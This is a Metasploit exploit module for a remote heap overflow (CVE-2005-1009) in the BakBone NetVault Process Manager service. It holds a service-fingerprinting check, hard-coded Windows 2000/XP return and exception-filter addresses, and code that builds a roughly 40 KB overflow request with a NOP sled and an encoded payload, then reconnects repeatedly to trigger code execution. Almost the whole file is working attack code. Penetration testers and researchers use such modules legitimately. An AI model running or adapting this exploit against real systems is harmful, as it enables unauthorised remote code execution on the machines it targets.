GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/misc/bakbone_netvault_heap.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
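class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata: name, references, payload constraints and the target
  # table of hard-coded return / unhandled-exception-filter address pairs.
  #
  # @param info [Hash] module info merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'BakBone NetVault Remote Heap Overflow',
        'Description' => %q{
          This module exploits a heap overflow in the BakBone NetVault
          Process Manager service. This code is a direct port of the netvault.c
          code written by nolimit and BuzzDee.
        },
        'Author' => [ 'hdm', '<nolimit.bugtraq[at]ri0tnet.net>' ],
        'References' => [
          ['CVE', '2005-1009'],
          ['OSVDB', '15234'],
          ['BID', '12967'],
        ],
        'Payload' => {
          'Space' => 1024,
          'BadChars' => "\x00\x20",
          # x86 `add esp, -0x1001; inc esp` run before the decoder — presumably
          # to move the stack away from the buffer the payload lives in.
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
        'Platform' => 'win',
        'Targets' => [
          # 'Ret' is written at offset 32792 of the request, 'UEF' at 32796.
          ['Windows 2000 SP4 English', { 'Ret' => 0x75036d7e, 'UEF' => 0x7c54144c } ],
          ['Windows XP SP0/SP1 English', { 'Ret' => 0x7c369bbd, 'UEF' => 0x77ed73b4 } ],
        ],

        'Privileged' => false,
        'DisclosureDate' => '2005-04-01',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(20031)
      ]
    )
  end

  # Fingerprints the service: sends a fixed 201-byte probe carrying the host
  # name "METASPLOIT" and looks for an "NVBuild" marker in the reply.
  #
  # @return [Exploit::CheckCode] Appears when a build number greater than 0
  #   is parsed out of the reply, Safe otherwise
  def check
    connect

    hname = "METASPLOIT"
    probe =
      "\xc9\x00\x00\x00\x01\xcb\x22\x77\xc9\x17\x00\x00\x00\x69\x3b\x69" +
      "\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69" +
      "\x3b\x73\x3b\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00" +
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00" +
      "\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00" +
      [ hname.length + 1 ].pack('V') + hname + "\x00"
    # Zero-pad the request to its fixed 201-byte length.
    probe += "\x00" * (201 - probe.length)

    sock.put(probe)
    # NOTE(review): the first argument of get_once is a byte count in
    # Rex::IO::Stream; if that holds here, a 1-byte read can never contain
    # "NVBuild" and this check always reports Safe — confirm the intended length.
    res = sock.get_once(1, 10)

    off = (res || '').index("NVBuild")

    if off
      # The build number is a 32-bit-length-prefixed string 21 bytes past
      # the start of the marker.
      off += 21
      len_field = res[off, 4]
      # A reply truncated inside the length field would otherwise make
      # unpack return nil and raise here instead of reporting Safe.
      if len_field && len_field.bytesize == 4
        ver = res[off + 4, len_field.unpack('V')[0]].to_i

        if ver > 0
          print_status("Detected NetVault Build #{ver}")
          return Exploit::CheckCode::Appears
        end
      end
    end

    return Exploit::CheckCode::Safe
  end

  # Sends the oversized request, then reconnects several times to trigger
  # the corrupted heap, and finally hands off to the payload handler.
  def exploit
    print_status("Trying target #{target.name}...")

    # Protocol header copied into the start of the request.
    head =
      "\x00\x00\x02\x01\x00\x00\x00\x8f\xd0\xf0\xca\x0b\x00\x00\x00\x69" +
      "\x3b\x62\x3b\x6f\x3b\x6f\x3b\x7a\x3b\x00\x11\x57\x3c\x42\x00\x01" +
      "\xb9\xf9\xa2\xc8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xa5\x97" +
      "\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x10" +
      "\x02\x4e\x3f\xac\x14\xcc\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" +
      "\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00" +
      "\x00\x10\x02\x4e\x3f\xc0\xa8\xea\xeb\x00\x00\x00\x00\x00\x00\x00" +
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
      "\x00\x01\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20" +
      "\x00\x00\x00\x10\x02\x4e\x3f\xc2\x97\x2c\xd3\x00\x00\x00\x00\x00" +
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
      "\x00\x00\x00\xb9\xf9\xa2\xc8\x02\x02\x00\x00\x00\xa5\x97\xf0\xca" +
      "\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x04\x02\x4e" +
      "\x3f\xac\x14\xcc\x0a\xb0\xfc\xe2\x00\x00\x00\x00\x00\xec\xfa\x8e" +
      "\x01\xa4\x6b\x41\x00\xe4\xfa\x8e\x01\xff\xff\xff\xff\x01\x02"

    # 39950-byte request: a NOP sled with the header, a two-byte short jump,
    # the target's two addresses and the encoded payload patched in at
    # fixed offsets.
    pattern = make_nops(39947) + "\x00\x00\x00"
    p = payload.encoded

    pattern[0, head.length] = head
    pattern[32790, 2] = "\xeb\x0a" # jmp short over the two address fields below
    pattern[32792, 4] = [ target.ret ].pack('V')
    pattern[32796, 4] = [ target['UEF'] ].pack('V')
    pattern[32800, p.length] = p

    sent = 0
    try = 0

    # The service does not always take the whole buffer in one write;
    # reconnect and retry until sock.put reports the full length.
    15.times do
      try += 1
      connect
      sent = sock.put(pattern)
      disconnect
      break if sent == pattern.length
    end

    # Decide on the write result itself rather than the attempt count, so a
    # write that succeeds on the final attempt is not reported as a failure.
    if sent != pattern.length
      print_error("Could not write full packet to server.")
      return
    end

    print_status("Overflow request sent, sleeping for four seconds (#{try} tries)")
    select(nil, nil, nil, 4)

    print_status("Attempting to trigger memory overwrite by reconnecting...")

    begin
      10.times do |x|
        connect
        sock.put(pattern)
        print_status(" Completed connection #{x}")
        sock.get_once(1, 1)
        disconnect
      end
    rescue => e
      # A connection failure in this loop is treated as best-effort (presumably
      # the service is already down); surface it in verbose mode only.
      vprint_status("Reconnect loop stopped early: #{e.class}: #{e.message}")
    end

    print_status("Waiting for payload to execute...")

    handler
    disconnect
  end

  # Extra seconds the framework waits for a session after exploit returns.
  #
  # @return [Integer] delay in seconds
  def wfs_delay
    5
  end
end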